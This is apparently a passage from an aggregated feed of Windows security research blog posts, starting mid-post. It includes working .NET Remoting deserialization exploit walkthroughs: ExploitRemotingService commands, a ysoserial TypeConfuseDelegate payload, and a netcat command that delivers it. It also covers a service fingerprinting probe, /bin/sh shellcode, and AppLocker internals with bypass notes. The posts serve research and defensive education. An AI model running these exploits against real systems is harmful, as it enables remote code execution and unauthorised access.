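    public int ToInt32(IFormatProvider p) => throw new InvalidCastException();
    public long ToInt64(IFormatProvider p) => throw new InvalidCastException();
    public sbyte ToSByte(IFormatProvider p) => throw new InvalidCastException();
    public float ToSingle(IFormatProvider p) => throw new InvalidCastException();
    public string ToString(IFormatProvider p) => throw new InvalidCastException();
    public ushort ToUInt16(IFormatProvider p) => throw new InvalidCastException();
    public uint ToUInt32(IFormatProvider p) => throw new InvalidCastException();
    public ulong ToUInt64(IFormatProvider p) => throw new InvalidCastException();
}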

This entire exploit is implemented behind the uselease option. It works in the same way as useser but should work even if the server is running in Low Type Filter mode. Of course there are caveats: this only works if the server sets up a bi-directional channel, so if it registers a TcpChannel or IpcChannel that should be fine, but if it just sets up a TcpServerChannel it might not work. Also you still need to know the URI of the server and bypass any authentication requirements.

If you want to try it out grab the code from GitHub and compile it. First run ExampleRemotingService with the following command line:

ExampleRemotingService.exe -t low

This will run the example service with Low Type Filter. Now you can try useser with the following command line:

ExploitRemotingService.exe --useser tcp://127.0.0.1:12345/RemotingServer ls c:\

You should notice it fails. Now change useser to uselease and rerun the command:

ExploitRemotingService.exe --uselease tcp://127.0.0.1:12345/RemotingServer ls c:\

You should see a directory listing of the C: drive. Finally if you pass the autodir option the exploit tool will try and upload an assembly to the server's base directory and bootstrap a full server from which you can call other commands such as exec.

ExploitRemotingService.exe --uselease --autodir tcp://127.0.0.1:12345/RemotingServer exec notepad

If it all works you should find the example server will spawn notepad. This works on a fully up to date version of .NET (e.g. .NET 4.8).

The takeaway from this is DO NOT EVER USE .NET REMOTING IN PRODUCTION. Even if you're lucky and you're not exploitable for some reason, the technology should be considered completely deprecated and (presumably) will never be ported to .NET Core.

Reverse Engineering Optimizations: Division By Multiplication

26 October 2019 at 15:06
Intro Reverse engineering compiler optimizations can delay a reverse engineer a lot. By learning how the compiler optimizes certain things, you can save lots of time. Knowing the pattern, the next time you see this optimization you’ll recognize right away how to decompile it. In this blog post series I’ll document how to decompile certain compiler optimizations, and I hope it’ll save some time for you. Division By Multiplication There’s no heavy math in this post lol.

Autochk Rootkit Analysis

1 November 2019 at 11:00
Introduction Finally had time to write about this rootkit I saw last week. This rootkit is very simple, it does not employ any uber fancy methods or anything, but I do find it nice so I wanted to share. The name of the driver is “autochk.sys” - that’s why we’ll call it the autochk rootkit. The sample is already known (28924b6329f5410a5cca30f3530a3fb8a97c23c9509a192f2092cbdf139a91d8), but I haven’t found any public analysis. The rootkit was compiled on 27/8/2017 according to the PE timestamp.

The Ethereal Beauty of a Missing Header

By: tiraniddo
6 November 2019 at 08:40
Skip to the end if you don't want to listen to me regaling you with a mostly made up story :-)

It was a dark and stormy night; as cliches go you might as well go with a classic. With little else to occupy my time I booted my PC, awoke my trusted companion Wireshark (née Ethereal) and looked at what communications were being lost to time due to the impermanence of localhost. Hey, don't judge me, I wrote a book on it remember?

Observing the pastel shaded runes flashing before my eyes I divined a new understanding of that which remains hidden from a mortal's gaze. As if a metaphor for our existence I observed the BITS service shouting into the void, desperately trying to ask a question of the WinRM service that will never be answered. In an instant something else caught my eye, unrelated to the intelligence or lack thereof of data transfers. As the hex flickered across my screen I realized in horror what it was; its grim visage staring at me like some horrible ghost of the past. What I saw both repulsed and excited me, here was something I could reason about:

Screenshot from wireshark showing .NET remoting network traffic which has a .NET magic at the start.

Those four little characters, .NET, reverberated in my mind, almost as if the computer was repeating a forbidden soliloquy on the assumption it wouldn't be overheard. Here in the year 2019 I shouldn't expect to read such a subversive codex as this. What malfeasance had my Operating System undertaken to spout such vulgar prose? It was a horrible night to find the .NET Remoting protocol.

It's said [citation needed], "Eternal damnation is reserved for evil people and developers who use insecure deprecated technologies," if such a distinction could be made between the two. Whoever was not paying attention to MSDN was clearly up to no good. I made the decision to track down the source of this abomination and bring them to justice. As with all high crimes, evidence of misdeeds is meaningless without suspects; assuming the perpetrator was still around I did what all good detectives do, used my position of authority (an Admin Command Prompt) and interrogated every shifty character hanging around the local neighborhood. Or at least I looked up the listening TCP ports using netstat with the -b switch to print the guilty party. Two suspects came immediately to light:

C:\> netstat -p TCP -nqb
....
TCP    127.0.0.1:51889        0.0.0.0:0              LISTENING
[devenv.exe]
TCP    127.0.0.1:51890        0.0.0.0:0              LISTENING
[Microsoft.Alm.Shared.Remoting.RemoteContainer.dll]

Caught red-handed, I moved in to apprehend them. Unfortunately, devenv (records indicate it's an alias for Mr Visual Studio 2017 Esq, a cad of some notoriety) was too unwieldy to subdue. However his partner in crime was not so blessed and easily fell within my clutches. Dragging him back to the (work)station I subjected the rogue, whom I nicknamed Al due to his long, unpronounceable name, to a thorough interrogation. He easily confessed his secrets with the application of a bit of decompilation, part of which I've reproduced below for the edification of the reader:

public static IRemotingChannel RegisterRemotingChannel(
                               string portName) {
    var sinkProvider = new BinaryServerFormatterSinkProvider
    {
        TypeFilterLevel = TypeFilterLevel.Full
    };
    var properties = new Dictionary<string, object> {
        { "name", portName },
        { "port", 0 },
        { "rejectRemoteRequests", true }
    };
    var channel = new TcpServerChannel(properties, sinkProvider);
    return new RemotingChannel(channel, 
            () => channel.GetChannelUri());
}

Of course, the use of .NET Remoting had Al bang to rights, but even if a judge decided that wasn't sufficient a crime I could also charge him with using a TCP channel with no authentication and enabling Full Type Filter mode. I asked Al to explain himself, so, speaking in a cod 18th Century Cockney accent (even though his identification was clearly of a man from the west coast of the United States of America), he tried to do so:

Moi: Didn't you know what you were doing was a crime against local security?
Al: Sure Guv'na, but devy told me that'd his bleedin' plan couldn't be exploited?
M: In what way did your mate 'devy' claim such a thing was possible?
A: Well for one, we'd not set a pre-agreed port to talk to us on. [Presumably referring to the use of port '0' which automatically allocates a random port].
M: But I found your port, it wasn't hard to do as I could hear you talking between yourselves. Surely he had a better plan than that?
A: Well, we don't trust the scum from outside the neighborhood, we only trusted people locally. [This was the meaning of rejectRemoteRequests which ensures it only bind the port to localhost].
M: I'm surprised you trust everyone locally? What about other ne'er-do-wells logged on to the same machine but in different sessions?
A: See coppa' we thought of that, in order to talk to me or devy you'd need to know our secret code word, without that you ain't gettin' nowt. [the portName presumably].

This final answer stumped me, sure they weren't authenticating each other but at least if the code word was unguessable it'd be hard to exploit them. Further investigation indicated their secret code word was a randomly generated Globally Unique Identifier which would be almost impossible to forge. Maybe I'd have to let Al free after all?

But something gnawed at me; neither Al nor Devy were very bright, there must be more to this story. After further pressing, Al confessed that he never remembered the code word, and instead had a friend, BinaryServerFormatterSink (Binny to those in a similar trade), verify it for them using the following check:

string objectUri = wkRequestHeaders.RequestUri;

if (objectUri != lastUri
    && RemotingServices.GetServerTypeForUri(objectUri) == null)
    throw new RemotingException();

lastUri = objectUri;

I realized that I'd got him. Binny was lazy: he remembered the last code word (lastUri) he'd been given and stored it away for safekeeping. If no one had ever talked to Al before then Binny didn't yet know the code word. You couldn't give him a random one, but if you didn't give him a code word at all then lastUri would equal objectUri because both were set to null. This whole scheme had come crashing down on their heads.

I reported Binny to the authorities (via a certain Chief Constable Dorrans) but they seemed to be little interested in making the perpetrator change their ways. I made a note in my log book (ExploitRemotingServices) and continued on my way, satisfied in a job well done, sort of.

The Less Wankery, Useful, Technical Bit

TL;DR; for some reason Visual Studio 2017 (and possibly 2019) has code which specifically uses .NET remoting in a fairly insecure way. It doesn't do authentication, it uses TCP for no obvious reason and it sets the type filter mode to Full which means it'd be trivially vulnerable to serialization attacks (see blog posts passim). However, on a positive note it does bind to localhost only, which will ensure it's not remotely exploitable and it chooses to generate a random service name, from a GUID, which makes it almost impossible to guess or brute force.

Therefore, it's basically unexploitable outside a difficult to win race condition and only if the attacker is on the same machine as the user running Visual Studio. I don't like those odds, so I never seriously considered reporting it to MSRC.

Why am I even blogging about it? It's all to do with the fact that you don't have to specify the URI: as long as no one has previously connected to the service successfully you can still reach the call to BinaryFormatter::Deserialize and potentially get arbitrary code execution. This might be especially interesting if you're running a pentesting engagement and you find an exposed .NET remoting service but do not have a copy of the client or server with which to extract the appropriate URI to make a call.

How would you know if you do find such a service? If you send garbage to a .NET remoting service (at least one not running in secure mode) it will respond with the previously mentioned magic ".NET" signature data, as shown in the following screenshot from Wireshark:

Screen shot of Wireshark following connection. The string Boo! is sent to the server which responds with .NET remoting protocol.
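
That behavior gives you a crude fingerprinting trick. Here's a small sketch of such a probe; it assumes, as in the screenshot, that the error response frame begins with the ".NET" magic:

// Rough probe sketch: send junk to a suspected endpoint and check whether the
// reply starts with the ".NET" remoting protocol magic. Illustrative only.
using System;
using System.Net.Sockets;
using System.Text;

class RemotingProbe
{
    static bool LooksLikeDotNetRemoting(string host, int port)
    {
        using (var client = new TcpClient(host, port))
        {
            client.ReceiveTimeout = 5000;
            NetworkStream stream = client.GetStream();
            byte[] junk = Encoding.ASCII.GetBytes("Boo!");
            stream.Write(junk, 0, junk.Length);

            byte[] reply = new byte[4];
            int read = stream.Read(reply, 0, reply.Length);
            // A non-secure endpoint responds with a frame starting ".NET".
            return read == 4 && Encoding.ASCII.GetString(reply) == ".NET";
        }
    }

    static void Main()
    {
        Console.WriteLine(LooksLikeDotNetRemoting("127.0.0.1", 1234));
    }
}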

When combined with the fact that the .NET remoting protocol doesn't require any negotiation (again assuming no secure mode) we can create a simple payload which would exploit any .NET remoting server assuming we have a suitable serialization payload, the server is running in Full type filter mode and nothing has previously connected to the service.

Let's put that payload together. You'll need the latest ExploitRemotingService from GitHub and also a copy of ysoserial.net to generate a serialization payload. First run the following ysoserial command to generate a simple TypeConfuseDelegate payload which will start notepad when deserialized, writing the raw data to the file run_notepad.bin:

ysoserial.exe -f BinaryFormatter -o raw -g TypeConfuseDelegate -c notepad > run_notepad.bin

Now run ExploitRemotingService, ensuring you pass both the --nulluri option and the --path to output the request to a file and use the raw command with the run_notepad.bin file:

ExploitRemotingService.exe --nulluri --path request.bin tcp://127.0.0.1:1234/RemotingServer raw run_notepad.bin

You'll now have a file which looks like the following:

Hex dump of request.bin.

Normally before the serialized data there should be the URI for the remoting service (as shown in the first screenshot of this blog post), which is not present in this file. We can now test this out, run the ExampleRemotingService with the following command line, binding to port 1234 and running with Full type filter mode:

ExampleRemotingService.exe -p 1234 -t full

Using your favorite testing tool, such as netcat, just dump the file to TCP port 1234:

nc 127.0.0.1 1234 < request.bin

If everything is correct, you'll find notepad starts. If it doesn't work ensure you've built ExampleRemotingService as a .NET 4 binary otherwise the serialization payload won't execute.

What if the service has been connected to before and so the last URI has been set? One trick would be to find a way of causing the server to crash *cough* but that's out of the scope of this blog post. If anyone fancies adding a new plugin to ysoserial to generate the raw payload rather than needing two tools, then be my guest.

I think it's worth stressing, once again, that you really should not be using .NET remoting on anything you care about. I'd be interested to find out if anyone manages to use this technique on a real engagement.

Abusing Signed Windows Drivers

12 November 2019 at 23:23
The Problem We all know the “Driver Signature Enforcement” feature in Windows. This security feature won’t allow you to load unsigned drivers into the Windows kernel. To bypass this protection, many attackers use vulnerable signed drivers, as Turla did. They try to find vulnerabilities in these drivers and exploit them. What people don’t think about is the fact that it’s way simpler than finding an exploitable memory corruption bug in a software driver - sometimes the driver just exposes the functionality via DeviceIoControl and this can be used to perform malicious operations in kernel mode.

The Internals of AppLocker - Part 1 - Overview and Setup

By: tiraniddo
16 November 2019 at 17:16
This is part 1 in a short series on the internals of AppLocker (AL). Part 2 is here, part 3 here and part 4 here.

AppLocker (AL) is a feature added to Windows 7 Enterprise and above as a more comprehensive application white-listing solution than the older Software Restriction Policies (SRP). When configured it's capable of blocking the creation of processes using various different rules, such as the application path, as well as optionally blocking DLLs, script code, MSI installers etc. Technology-wise it's slowly being replaced by the more robust Windows Defender Application Control (WDAC) which was born out of User Mode Code Integrity (UMCI), however at the moment AL is still easier to configure in an enterprise environment. It's considered a "Defense in Depth" feature according to MSRC's security servicing criteria, so unless you find a bug which gives you EoP or RCE it's not something Microsoft will fix with a security bulletin.

It's common to find documentation on configuring AL, and even on bypassing it (see for example Oddvar Moe's case study series on his website), however the inner workings are usually harder to find. Some examples of documentation which go some way towards describing AL internals that I could find are:
However even these articles don't really give the full details. Therefore, I thought I'd dig a little deeper into some of the inner workings of AL, specifically focusing on the relationship between user access tokens and the applied rules. I'm not going to talk about configuration (outside of a quick setup for demonstration purposes) and I'm not really going to talk about bypasses. However, I will also pass on some dumb tricks you can do with an AL configured system which might be "bypass-like". Also note that this is documenting the behavior on Windows 10 1909 Enterprise. The internals might be, and almost certainly are, different on other versions of Windows.

Let's start with a basic overview of the various components and give a super quick setup guide for a basic AL enabled Windows 10 1909 Enterprise installation so that we can try things out in subsequent parts.

Component Overview

AL uses a combination of a kernel driver (APPID.SYS) and user mode service (APPIDSVC). The introduction of kernel code is what distinguishes it from the old SRP which was entirely enforced in user mode, and so wasn't too difficult to bypass. The kernel driver's primary role is to handle blocking process creation through a Process Notification Callback as well as provide some general services. The user mode service on the other hand is more of a helper to do things which are difficult or impractical in the kernel, such as comprehensive code signature verification. That said looking at the implementation I think the majority could be done entirely in kernel mode considering that's what the Code Integrity (CI) module already does.

For DLL, Script and MSI enforcement various user-mode components access the SAFER APIs to determine whether code should run. The SAFER APIs might then call into the kernel driver or into the service over RPC depending on what it needs to do. I've summarized the various links in the following diagram.

The various interactions between components in AppLocker.

Setting up a Test System

I started by installing Windows 10 1909 Enterprise from an MSDN ISO. If you don't have MSDN access you can get a trial Dev Environment VM from Microsoft which runs Windows 10 Enterprise. At the time of writing it's only 1903, but that's probably good enough; you should even be able to update to 1909 if you so desire. Then follow the next steps:
  1. Startup the VM and login as an administrator, then run an admin PowerShell console.
  2. Download the Default AppLocker Policy file from GitHub and save it as policy.xml.
  3. Run the PowerShell command "Set-AppLockerPolicy -XmlPolicy policy.xml".
  4. Run the command "sc.exe config appidsvc start= auto".
  5. Reboot the VM. 
This will install a simple default policy then enables the Application Identity Service. The policy is as follows:
  • EXE Rules
    • Allow Everyone group access to run any executable under %WINDIR% and %PROGRAMFILES%.
    • Allow Administrators group to run any executable from anywhere.
  • DLL Rules
    • Allow Everyone group access to load any DLL under %WINDIR% and %PROGRAMFILES%.
    • Allow Administrators group to load a DLL from anywhere.
  • APPX Rules (Packages Applications, think store applications)
    • Allow Everyone to load any signed, packaged application.
Of course these rules are terrible and no one should actually use them, I've just presented them for the purposes of this blog post series.

Where is the policy configuration stored? There's some data in the registry, but the core of the policy configuration is stored in the directory %WINDIR%\SYSTEM32\APPLOCKER, separated by type. For example the executable configuration is in EXE.APPLOCKER; the other names should be self explanatory. When the files in this directory are modified a call is made to the driver to reload the policy configuration. If you take a look at one of these files in a hex editor you'll find they're nothing like the XML policy we put in (as shown below); we'll come back to what these files actually contain in part 3 of this blog series.

Hex dump of the Exe.Applocker file which shows only binary data, no XML.

Once you reboot the VM the service will be running and AL will be enforced. If you log in as the administrator again, copy an executable to their Desktop folder (a location not allowed by policy) and run it, you'll find it works... You might think this makes sense: the user is an administrator, which should be allowed to execute everything from anywhere. However the default administrator is a UAC split-token admin, so the default "user" wouldn't have the Administrators group and so shouldn't be allowed to run code from anywhere. We'll get back to why this works in part 3.

To check AL is working create a new user (say using the New-LocalUser PowerShell command) and do not assign them to the local administrators group. Login as the new user and try copying and running the executable on the desktop again. You should be greeted with a suitable error dialog.

AppLocker error showing executable has been blocked from running.

It should be noted that even if you just enable the APPID driver AL won't be enforced; the service needs to be running for everything to be correctly enabled. You might assume you can just disable the service as an administrator and turn off AL trivially? Well, about that...

C:\> sc.exe config appidsvc start= demand
[SC] ChangeServiceConfig FAILED 5:

Access is denied.

Seems you can't reconfigure the service back to demand start (its initial start mode) once you've auto started it. The answer to why you're given access denied is simple:

C:\> sc.exe qprotection appidsvc
[SC] QueryServiceConfig2 SUCCESS
SERVICE appidsvc PROTECTION LEVEL: WINDOWS LIGHT.

On Windows 10 (I've not checked 8.1) the AppID service runs as PPL. This means the Service Control Manager (SCM) prevents "normal" administrators from tampering with the service, such as disabling it or stopping it. I really don't see why Microsoft did this; there are SO many different ways to compromise AppLocker's function as an administrator it's not funny, and disabling the service should presumably be the least of your worries. Oh well; if you really must disable the service at run time you can use the Task Scheduler trick I showed in September to run commands as TrustedInstaller, which happens to be a backdoor into the SCM. Try running the following PowerShell script as an administrator:

That's all for now, in part 2 we'll dig into how the Executable enforcement works under the hood.


Monitoring linux system-calls the right way

18 November 2019 at 00:00
This ten-year-old vulnerability found by Chris Evans should remind us once more how important it is, on modern linux systems, to take care of how we do security monitoring of software and user behaviour. Here’s the knot. This simple assembly code spawns /bin/sh via execve and then exits. BITS 64 global _start section .text _start: jmp short jump main: pop rbx ; stack needs x64 register [rbx]- ; string address offset fits into 32 bit though xor eax, eax mov ecx, eax mov edx, eax mov al, 0xb int 0x80 ; execve_syscall xor eax,eax inc eax int 0x80 ; exit_syscall jump: call main message db "/bin/sh" If we compile it as an x64 ELF binary we can start noticing a few shenanigans.

The Internals of AppLocker - Part 2 - Blocking Process Creation

By: tiraniddo
18 November 2019 at 06:06
This is part 2 in a short series on the internals of AppLocker (AL). Part 1 is here, part 3 here and part 4 here.

In the previous blog post I briefly discussed the architecture of AppLocker (AL) and how to set up a really basic test system based on Windows 10 1909 Enterprise. This time I'm going to start going into more depth about how AL blocks the creation of processes which are not permitted by policy. I'll reiterate, in case you've forgotten, that what I'm describing is the internals on Windows 10 1909; the details can be, and almost certainly are, different on other operating systems.

How Can You Block Process Creation?

When the APPID driver starts it registers a process notification callback with the PsSetCreateProcessNotifyRoutineEx API. A process notification callback can return an error code by assigning to the CreationStatus field of the PS_CREATE_NOTIFY_INFO structure to block process creation. If the kernel detects a callback setting an error code then the process is immediately terminated by calling PsTerminateProcess.

An interesting observation is that the process notification callback is NOT called when the process object is created. It's actually called when the first thread is inserted into the process. The callback is made in the context of the thread creating the new thread, which is usually the thread creating the process, but it doesn't have to be. If you look in the PspInsertThread function in the kernel you'll find code which looks like the following:

if (++Process->ActiveThreads == 1)
  CurrentFlags |= FLAG_FIRST_THREAD;
// ...
if (CurrentFlags & FLAG_FIRST_THREAD) {
  if (!Process->Flags3.Minimal || Process->PicoContext)
    PspCallProcessNotifyRoutines(Process);
}

This code first increments the active thread count for the process. If the current count is 1 then a flag is set for use later in the function. Further on the call is made to PspCallProcessNotifyRoutines to invoke the registered callbacks, which is where the APPID callback will be invoked.

The fact the callback seems to be called at process creation time is due to most processes being created using NtCreateUserProcess, which does both the process and the initial thread creation as one operation. However you could call NtCreateProcessEx to create a new process and that will succeed; it's just that, in theory, you could never insert a thread into it without triggering the notification. Whether there's a race condition here, where you could get ActiveThreadCount to never be 1, I wouldn't like to say; almost certainly there's a process lock which would prevent it.

The behavior of blocking process creation after the process has been created is the key difference between WDAC and AL. WDAC prevents the creation of any executable code which doesn't meet the defined policy, therefore if you try and create a process with an executable file which doesn't match the policy it'll fail very early in process creation. However AL will allow you to create a process, doing many of the initialization tasks, and only once a thread is inserted into the process will the rug be pulled away.

The use of the process notification callback does have one current weakness: it doesn't work on Windows Subsystem for Linux processes. And when I say it doesn't work, I mean the APPID callback never gets invoked, and as process creation is only blocked by invoking the callback this means any WSL process will run unmolested.

It isn't anything to do with the checks for Minimal/PicoContext in the code above (or seemingly due to image formats, as Alex Ionescu mentioned in his talk on WSL, although that might be why AL doesn't even try), it's due to the way the APPID driver has enabled its notification callback. Specifically APPID calls the PsSetCreateProcessNotifyRoutineEx method, however this will not generate callbacks for WSL processes. Instead APPID would need to use PsSetCreateProcessNotifyRoutineEx2 to get callbacks for WSL processes. While it's probably not worth MS implementing actual AL support for WSL processes, I'm surprised they don't give an option to block them outright rather than just allowing anything to run.

Why Does AppLocker Decide to Block a Process?

We now know how process creation is blocked, but we don't know why AL decides a process should be blocked. Of course we have our configured rules which must be enforced somehow. Each rule consists of three parts:
  1. Whether the rule allows the process to be created or whether it denies creation.
  2. The User or Group the rule applies to.
  3. The property that the rule checks for, this could be an executable path, the hash of the executable file or publisher certificate and version information. A simple path example is "%WINDIR%\*" which allows any executable to run as long as it's located under the Windows Directory.
Let's dig into the APPID process notification callback, AiProcessNotifyRoutine, to find out what is actually happening, the simplified code is below:

void AiProcessNotifyRoutine(PEPROCESS Process, 
                HANDLE ProcessId, 
PPS_CREATE_NOTIFY_INFO CreateInfo) {
  PUNICODE_STRING ImageFileName;
  if (CreateInfo->FileOpenNameAvailable)
    ImageFileName = CreateInfo->ImageFileName;
  else
    SeLocateProcessImageName(Process, 
                             &ImageFileName);

  CreateInfo->CreationStatus = AipCreateProcessNotifyRoutine(
             ProcessId, ImageFileName, 
             CreateInfo->FileObject, 
             Process, CreateInfo);
}

The first thing the callback does is extract the path to the executable image for the process being checked. The PS_CREATE_NOTIFY_INFO structure passed to the callback can contain the image file path if the FileOpenNameAvailable flag is set. However there are situations where this flag is not set (such as in WSL) in which case the code gets the path using SeLocateProcessImageName. We know that having the full image path is important as that's one of the main selection criteria in the AL rule sets.

The next call is to the inner function, AipCreateProcessNotifyRoutine. The status code returned from this function is assigned to CreationStatus, so if this function fails then the process will be terminated. There's a lot going on in this function; I'm going to simplify it as much as I can to get the basic gist of what's going on while glossing over some features such as AppX support and Smart Locker (though they might come back in a later blog post). For now it looks like the following:

NTSTATUS AipCreateProcessNotifyRoutine(
        HANDLE ProcessId, 
        PUNICODE_STRING ImageFileName, 
        PFILE_OBJECT ImageFileObject, 
        PVOID Process, 
        PPS_CREATE_NOTIFY_INFO CreateInfo) {

    POLICY* policy = SrpGetPolicy();
    if (!policy)
        return STATUS_ACCESS_DISABLED_BY_POLICY_OTHER;
    
    HANDLE ProcessToken;
    HANDLE AccessCheckToken;
    
    AiGetTokens(ProcessId, &ProcessToken, &AccessCheckToken);

    if (AiIsTokenSandBoxed(ProcessToken))
        return STATUS_SUCCESS;

    BOOLEAN ServiceToken = SrpIsTokenService(ProcessToken);
    if (SrpServiceBypass(Policy, ServiceToken, 0, TRUE))
        return STATUS_SUCCESS;
    
    HANDLE FileHandle;
    AiOpenImageFile(ImageFileName,
                    ImageFileObject, 
                    &FileHandle);
    AiSetAttributesExe(Policy, FileHandle, 
                       ProcessToken, AccessCheckToken);
    
    NTSTATUS result = SrppAccessCheck(
                      AccessCheckToken,
                      Policy);
    
    if (!NT_SUCCESS(result)) {
        AiLogFileAndStatusEvent(...);
        if (Policy->AuditOnly)
            result = STATUS_SUCCESS;
    }
    
    return result;
}

A lot to unpack here, but we can start at the beginning. The first thing the code does is request the current global policy object. If no configured policy exists then the status code STATUS_ACCESS_DISABLED_BY_POLICY_OTHER is returned. You'll see this status code come up a lot when a process is blocked. Normally even if AL isn't enabled there's still a policy object, it'll just be configured to not block anything. I'd imagine if somehow there was no global policy then every process creation would fail, which would not be good.

Next we get into the core of the check, first with a call to the function AiGetTokens. This function opens a handle to the target process' access token based on its PID (why it doesn't just use the Process object from the PS_CREATE_NOTIFY_INFO structure escapes me, but this is probably just legacy code). It also returns a second token handle, the access check token; we'll see how this is important later.

The code then checks two things based on the process token. First it calls AiIsTokenSandBoxed. Unfortunately this is badly named, at least in a modern context, as it doesn't refer to whether the token is a restricted token such as those used in web browser sandboxes. What it's actually checking is whether the token has the Sandbox Inert flag set. One way of setting this flag is by calling CreateRestrictedToken passing the SANDBOX_INERT flag. Since Windows 8, or Windows 7 with KB2532445 installed, the "caller must be running as LocalSystem or TrustedInstaller or the system ignores this flag" according to the documentation. The documentation isn't entirely correct on this point; if you go and look at the implementation in NtFilterToken you'll find you can also set the flag if you have the SERVICE SID, which covers basically all services regardless of type. The result of this check is that if the process token has the Sandbox Inert flag set then a success code is returned and AL is bypassed for this new process.
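
For reference, this is roughly how a caller would ask for the flag (a hedged sketch; as noted above, unless you're LocalSystem, TrustedInstaller or a service the kernel just ignores SANDBOX_INERT):

// Sketch of requesting the Sandbox Inert flag via CreateRestrictedToken.
using System;
using System.ComponentModel;
using System.Runtime.InteropServices;

static class SandboxInert
{
    const uint SANDBOX_INERT = 0x2;

    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool CreateRestrictedToken(
        IntPtr ExistingTokenHandle,
        uint Flags,
        uint DisableSidCount, IntPtr SidsToDisable,
        uint DeletePrivilegeCount, IntPtr PrivilegesToDelete,
        uint RestrictedSidCount, IntPtr SidsToRestrict,
        out IntPtr NewTokenHandle);

    public static IntPtr CreateInertToken(IntPtr existingToken)
    {
        // No SIDs or privileges are filtered; we only ask for the inert flag.
        if (!CreateRestrictedToken(existingToken, SANDBOX_INERT,
                0, IntPtr.Zero, 0, IntPtr.Zero, 0, IntPtr.Zero,
                out IntPtr newToken))
            throw new Win32Exception();
        return newToken;
    }
}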

The second check determines if the token is a service token, first calling SrpIsTokenService to get a true or false value, then calling SrpServiceBypass to determine if the current policy allows service tokens to bypass the policy as well. If SrpServiceBypass returns true then the callback also returns a success code, bypassing AL. It does seem to be possible to configure AL to enforce process checks on service processes, however I can't for the life of me find the documentation for this setting. It's probably far too dangerous a setting to allow the average sysadmin to use.

What's considered a service context is very similar to setting the Sandbox Inert flag with CreateRestrictedToken. If you have one of the following groups in the process token it's considered a service:

NT AUTHORITY\SYSTEM
NT AUTHORITY\SERVICE
NT AUTHORITY\RESTRICTED
NT AUTHORITY\WRITE RESTRICTED

The last two groups are only used to allow for services running as restricted or write restricted. Without them access would not be granted in the service check and AL might end up being enforced when it shouldn't.

With that out of the way, we now get on to the meat of the checking process. First the code opens a handle to the main executable's file object. Access to the file will be needed if rules such as hash or publisher certificate are used; it'll open the file even if those rules aren't being used, just in case. Next a call is made to AiSetAttributesExe which takes the access token handles, the policy and the file handle. This must do something magical, but being the tease I am we'll leave it for now. Finally in this section a call is made to SrppAccessCheck which, as its name suggests, performs the access check against the policy to determine whether this process is allowed to be created. Note that only the access check token is passed, not the process token.

The use of an access check, verifying a Security Descriptor against an Access Token, makes perfect sense when you think of how the rules are structured. The allow and deny rules correspond well to allow or deny ACEs for specific group SIDs. How rule specifications such as path restrictions are enforced is less clear, but we'll leave the details of that for next time.

The result of the access check is the status code returned from AipCreateProcessNotifyRoutine, which ends up being set as the CreationStatus field in the notification structure and can terminate the process. We can assume that this result will either be a success or an error code such as STATUS_ACCESS_DISABLED_BY_POLICY_OTHER.

One final step is necessary: logging an event if the access check failed. If the result of the access check is an error, but the policy is currently configured in Audit Only mode (i.e. not enforcing AL process creation), then the log entry will be made but the status code is reset back to success so that the kernel will not terminate the process.

Testing System Behavior

Before we go, let's test the behavior that we can create a process which is against the configured policy, as long as there are no threads in it. This is probably not a useful behavior, but it's always good to try and verify your assumptions about reverse engineered code.

To do the test we'll need to install my NtObjectManager PowerShell module. We'll use the module more going forward so might as well install it now. To do that follow this procedure on the VM we setup last time:
  1. In an administrator PowerShell console, run the command 'Install-Module NtObjectManager'. Running this command as an admin allows the module to be installed in Program Files which is one of the permitted locations for Everyone in part 1's sample rules.
  2. Set the system execution policy to unrestricted from the same PowerShell window using the command 'Set-ExecutionPolicy -ExecutionPolicy Unrestricted'. This allows unsigned scripts to run for all users.
  3. Log in as the non-admin user, otherwise nothing will be enforced.
  4. Start a PowerShell console and ensure you can load the NtObjectManager module by running 'Import-Module NtObjectManager'. You shouldn't see any errors.
From part 1 you should already have an executable in the Desktop folder which if you run it it'll be blocked by policy (if not copy something else to the desktop, say a copy of NOTEPAD.EXE).

Now run the following three commands in the PowerShell windows. You might need to adjust the executable path as appropriate for the file you copied (and don't forget the \?? prefix).

$path = "\??\C:\Users\$env:USERNAME\Desktop\notepad.exe"
$sect = New-NtSectionImage -Path $path
$p = [NtApiDotNet.NtProcess]::CreateProcessEx($sect)
Get-NtStatus $p.ExitStatus

After the call to Get-NtStatus it should print that the current exit code for the process is STATUS_PENDING. This is an indication that the process is alive, although at the moment we don't have any code running in it. Now create a new thread in the process using the following:

[NtApiDotNet.NtThread]::Create($p,0,0,"Suspended",4096)
Get-NtStatus $p.ExitStatus

After calling NtThread::Create you should receive a big red exception error and the call to Get-NtStatus should now show that the process returned an error. To make it clearer I've reproduced the example in the following screenshot:

Screenshot of PowerShell showing the process creation and error when a thread is added.

That's all for this post. Of course there are still a few big mysteries to solve: why does AiGetTokens return two token handles, what is AiSetAttributesExe doing and how does SrppAccessCheck verify the policy through an access check? Find out next time.


The Internals of AppLocker - Part 3 - Access Tokens and Access Checking

By: tiraniddo
20 November 2019 at 06:30
This is part 3 in a short series on the internals of AppLocker (AL). Part 1 is here, part 2 here and part 4 here.

In the last part I outlined how process creation is blocked with AL. I crucially left out exactly how the rules are processed to determine if a particular user was allowed to create a process. As it makes more sense to do so, we're going to go in reverse order from how the process was described in the last post. Let's start by talking about the access check implemented by SrppAccessCheck.

Access Checking and Security Descriptors

For all intents and purposes the SrppAccessCheck function is just a wrapper around a specially exported kernel API, SeSrpAccessCheck. While the API has a few unusual features, for this discussion we might as well treat it as the normal SeAccessCheck API.

A Windows access check takes 4 main parameters:
  • SECURITY_SUBJECT_CONTEXT which identifies the caller's access tokens.
  • A desired access mask.
  • A GENERIC_MAPPING structure which allows the access check to convert generic access to object specific access rights.
  • And most importantly, the Security Descriptor which describes the security of the resource being checked.
Let's look at some code.

NTSTATUS SrpAccessCheckCommon(HANDLE TokenHandle, BYTE* Policy) {
    
    SECURITY_SUBJECT_CONTEXT Subject = {};
    ObReferenceObjectByHandle(TokenHandle, &Subject.PrimaryToken);
    
    DWORD SecurityOffset = *((DWORD*)Policy + 4);
    PSECURITY_DESCRIPTOR SD = Policy + SecurityOffset;
    
    NTSTATUS AccessStatus;
    if (!SeSrpAccessCheck(&Subject, FILE_EXECUTE,
                          &FileGenericMapping, 
                          SD, &AccessStatus) &&
        AccessStatus == STATUS_ACCESS_DENIED) {
        return STATUS_ACCESS_DISABLED_BY_POLICY_OTHER;
    }
    
    return AccessStatus;
}

